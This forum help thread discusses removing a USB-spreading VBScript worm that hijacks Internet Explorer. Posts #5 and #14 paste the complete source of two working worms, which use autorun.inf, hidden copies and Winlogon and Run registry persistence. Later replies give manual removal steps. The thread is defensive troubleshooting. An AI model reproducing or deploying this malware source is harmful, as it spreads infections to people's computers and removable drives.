| Forum |
|
|||||||
| Software Q&A Having trouble with software? Find solutions here |
![]() |
|
|
LinkBack (3) | Thread Tools | Display Modes |
|
|
#1 (permalink)
|
|
WOW... are you?
Join Date: Feb 2006
Location: Kathmandu, Nepal
Posts: 152
|
Well somehow i have contracted this lil "virus, or bug... or some script written by pesty over smart programmer" grrrrr x( Now thing is when i open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all" Now i remove the title bar "name" and also change the home page in my IE... and as soon as i restart my browser... Blast !! there you go, it appears again !!! BUT when i kill the "wscript.exe" from "Windows Task manager" it won't happen... why ? what ? and how to remove this problem !!! HELP... HELP Mike here... desperate |
|
|
| Advertisements. Register and be a member of the community to get rid of them. | |
|
Advertisement
|
|
|
|
#2 (permalink) |
|
Commander in Chief
Join Date: Jul 2005
Posts: 6,657
|
I think I already helped you with the same problem before or this is a false deja vu am experiencing ...
Anyway, you're infected with the "Hacked by Godzilla" attack. Solution's here: http://howto.redcomputer.net/windows...y_godzilla.php |
|
|
|
|
#3 (permalink) |
|
WOW... are you?
Join Date: Feb 2006
Location: Kathmandu, Nepal
Posts: 152
|
qwerty maniac thanks... but that file is not there, the one i should delete. the "vbs file"
Anyways mine just says in IE title bar "www.sujin.com.np" and tries to re-direct my browser to this site... which is now down help |
|
|
|
|
#4 (permalink) | |
|
Commander in Chief
Join Date: Jul 2005
Posts: 6,657
|
Site's pretty apologetic but I think its nearly the same infection.
From site (Google Cache): Quote:
And yes, delete ALL vbs and autorun from all your drives, even your externals, pen drives and phones. |
|
|
|
|
|
#5 (permalink) |
|
WOW... are you?
Join Date: Feb 2006
Location: Kathmandu, Nepal
Posts: 152
|
I opened one of my Pen drives... and found this "Virusremoval.vbs" and "autorun.inf"
Now i opened the VBS file in Notepad... and here what it says: Shall i click on it... or is it just a way of infecting more? '************************************************* ***************** '********************* Virus Removal VBScript ********************* '************************** Version 1.00 ************************** '************************************************* ***************** 'This antivirus program is intended to repair your computer from 'any sorts of virus attacks. 'This program is exactly like a normal virus but it repairs things 'rather than destroying them. '************************************************* ***************** '************************************************* ***************** 'Program developed by 'Sujin Joshi 'http://Sujin.com.np 'sujinjoshi@gmail.com Option Explicit On Error Resume Next Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives, InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,fi les,Delete,auto,root Set Fso = CreateObject("Scripting.FileSystemObject") Set Shells = CreateObject("Wscript.Shell") Set WinDir = Fso.GetSpecialFolder(0) Set SystemDir =Fso.GetSpecialFolder(1) Set File = Fso.GetFile(WScript.ScriptFullName) Set Drv = File.Drive Set InDrive = Fso.drives Set ReadAll = File.OpenAsTextStream(1,-2) do while not ReadAll.atendofstream AllFile = AllFile & ReadAll.readline AllFile = AllFile & vbcrlf Loop Count=Drv.DriveType Do If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true) WriteAll.Write AllFile WriteAll.close set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs") WriteAll.Attributes = -1 End If Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools","0","REG_DWORD " Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs" For Each Drives In InDrive root = Drives.Path & "\" If Fso.GetParentFolderName(WScript.ScriptFullName)=ro ot Then Shells.Run "explorer.exe " & root End If Set folder=Fso.GetFolder(root) Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true) For Each files In folder.Files auto=Left(files.Name,7) If UCase(auto)=UCase("autorun") Then Set Delete = Fso.DeleteFile(root & files.Name,true) End If Next If Drives.DriveType=2 Then delext "inf",Drives.Path & "\" delext "INF",Drives.Path & "\" End if If Drives.DriveType = 1 Or Drives.DriveType = 2 Then If Drives.Path<> "A:" Then delext "vbs",WinDir & "\" delext "vbs",Drives.Path & "\" If Fso.FileExists(Drives.Path & "\ravmon.exe") Then Fso.DeleteFile(Drives.Path & "\ravmon.exe") End If If Fso.FileExists(Drives.Path & "\sxs.exe") Then Fso.DeleteFile(Drives.Path & "\sxs.exe") End If If Fso.FileExists(Drives.Path & "\winfile.exe") Then Fso.DeleteFile(Drives.Path & "\winfile.exe") End If If Fso.FileExists(Drives.Path & "\run.wsh") Then Fso.DeleteFile(Drives.Path & "\run.wsh") End If If Drives.DriveType = 1 Then If Drives.Path<>"A:" Then If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs") WriteAll.Attributes = -1 End If If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf") Chg.Attributes = -8 Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 else Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 End if End If End If End if End If Next if Count <> 1 then Wscript.sleep 10000 end if loop while Count<>1 sub delext(File2Find, SrchPath) Dim oFileSys, oFolder, oFile,Cut,Delete Set oFileSys = CreateObject("Scripting.FileSystemObject") Set oFolder = oFileSys.GetFolder(SrchPath) For Each oFile In oFolder.Files Cut=Right(oFile.Name,3) If UCase(Cut)=UCase(file2find) Then If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true) End If Next End sub |
|
|
|
|
#6 (permalink) |
|
Yalam
Join Date: Jul 2007
Location: Chilgok, South Korea
Posts: 44
|
First
Open task manager and kill process wscript.exe. Then Delete VirusRemoval.vbs and Autorun.inf files from all usb drives. Then Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files. Then Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon On the right side look for Shell which should have value of just explorer.exe. delete anything after explorer.exe. Under same key Winlogon also look for Userinit which should have value of c:\WINDOWS\system32\userinit.exe, Delete all the crap after the comma. Then Go to HKCU\Software\Microsoft\Internet Explorer\Main On the right side locate Window Title and delete its value i.e. Sujin.com.np Under the same key locate Start Page and delete its value i.e. http://sujin.com.np/ I think that's all guys. I'm sure it will help. Guys u can also disable the use of vbs and js files from the registry. For that Go to HKLM\Software\Microsoft\Windows Script Host\Settings On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs or js files it will display the message you can see on your own. |
|
|
|
|
#7 (permalink) | |
|
Right Off the Assembly Line
Join Date: Nov 2007
Posts: 1
|
Yavin's process removes the virus but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and enable the disabled task manager and folder options.
You guys can also try it from: http://www.kusom.edu.np/new/notices_...hp?noticeid=13 or http://www.swiftnepal.net/ Quote:
Last edited by NavinRaj; 15-11-2007 at 10:16 PM. |
|
|
|
|
|
#8 (permalink) |
|
The Thunderer
Join Date: Jun 2007
Location: Thimphu, Bhutan
Posts: 151
|
Does any one have a software of Antivirus which can remove this sujin.com.np? I think I have to inform the case to Cyber Crime Investigation so that who ever is this Sujin is wrecked for the whole life to avoid in making such kind of tools. this hell **** is making my system slow and even I cannot do my work efficiently.
|
|
|
|
|
#10 (permalink) |
|
The Thunderer
Join Date: Jun 2007
Location: Thimphu, Bhutan
Posts: 151
|
NOD32? Does this functions good enough to clear this virus from every corner o our system? or it just takes out the title and web address from our IE.....I think http://www.swiftnepal.net/ has a anti virus for this problem which functions well...what u think my fellow users?
|
|
|
|
|
#11 (permalink) |
|
Right Off the Assembly Line
Join Date: Dec 2007
Posts: 1
|
How can remove Virusremoval.vbs
Setp1 Setp 2: go to toos Menu>folder Options>view (TAb)> Uncheck Hide extentions for known file types & check Show hiden file and folder & unchek Hide protected operating system files. Step3: go run> c:\windows\system32\ Step4: Search "Virsuremoval.vbs" Step5:rename file "Virsuremoval.vbs" to "virusremoval" and Enjoy! |
|
|
|
|
#14 (permalink) |
|
Right Off the Assembly Line
Join Date: Jul 2009
Posts: 1
|
I opened one of my Pen drives... and found this "auto1.vbs" and "autorun.inf"
Now i opened the VBS file in Notepad... and here what it says: Shall i click on it... or is it just a way of infecting more? On Error Resume Next Dim fso, wscr, tf, scrText, win, ax Set fso = CreateObject("Scripting.FileSystemObject") Set wscr = CreateObject("WScript.Shell") win = fso.GetSpecialFolder(0) tf = WScript.ScriptFullName x = LCase(tf) If Mid(x, 4) = "auto1.vbs" Then wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path End If Set myFile = fso.Getfile(tf).OpenAsTextStream(1) Do Until myFile.AtEndOfStream scrText = scrText & myFile.ReadLine & vbCrLf Loop ax = fso.FileExists(win & "\auto1.vbs") Set myFile = fso.CreateTextFile(win & "\auto1.vbs", true) myFile.write scrText myFile.close Set fAttr = fso.Getfile(win & "\auto1.vbs") fAttr.Attributes=39 wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\autoMe1", "wscript.exe """ & win & "\auto1.vbs""" If ax = false Then wscr.Run "wscript.exe """ & win & "\auto1.vbs""" While (true) Set myDrives = fso.Drives For Each myFlashDrive In myDrives If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf") fAttr.Attributes=32 fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true End If Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true) auFile.write "[autorun]" & vbCrLf & "open=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Command=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Default=1" auFile.close Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf") fAttr.Attributes=39 Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\auto1.vbs", true) myFile.write scrText myFile.close Set fAttr = fso.Getfile(myFlashDrive.Path & "\auto1.vbs") fAttr.Attributes=39 End If Next With wscr .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\autoMe", "wscript.exe """ & win & "\auto1.vbs""" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD" End With If tf <> win & "\auto1.vbs" Then If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit End If WScript.Sleep 10000 Wend |
|
|
|
|
#15 (permalink) |
|
Right Off the Assembly Line
Join Date: Nov 2004
Location: kathmandu,nepal
Posts: 13
|
The post from NavinRaj should definitely work because it had been a big issue in Nepal several years ago and the tool suggested fixed it good.
__________________
<<<<<<<<<<<<<<<SaXaM>>>>>>>>>>>> |
|
|
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
|
|
LinkBacks (?)
LinkBack to this Thread: http://www.thinkdigit.com/forum/software-q/71097-wscript-exe-blame.html
|
||||
| Posted By | For | Type | Date | |
| VirusRemoval.vbs Windows Script Host | This thread | Refback | 07-02-2012 11:54 PM | |
| Think. Done. - VirusRemoval.vbs Windows Script Host | This thread | Refback | 21-08-2010 03:35 PM | |
| Sai Charan's (b)Log: VirusRemoval.vbs Windows Script Host | This thread | Refback | 17-07-2010 04:27 AM | |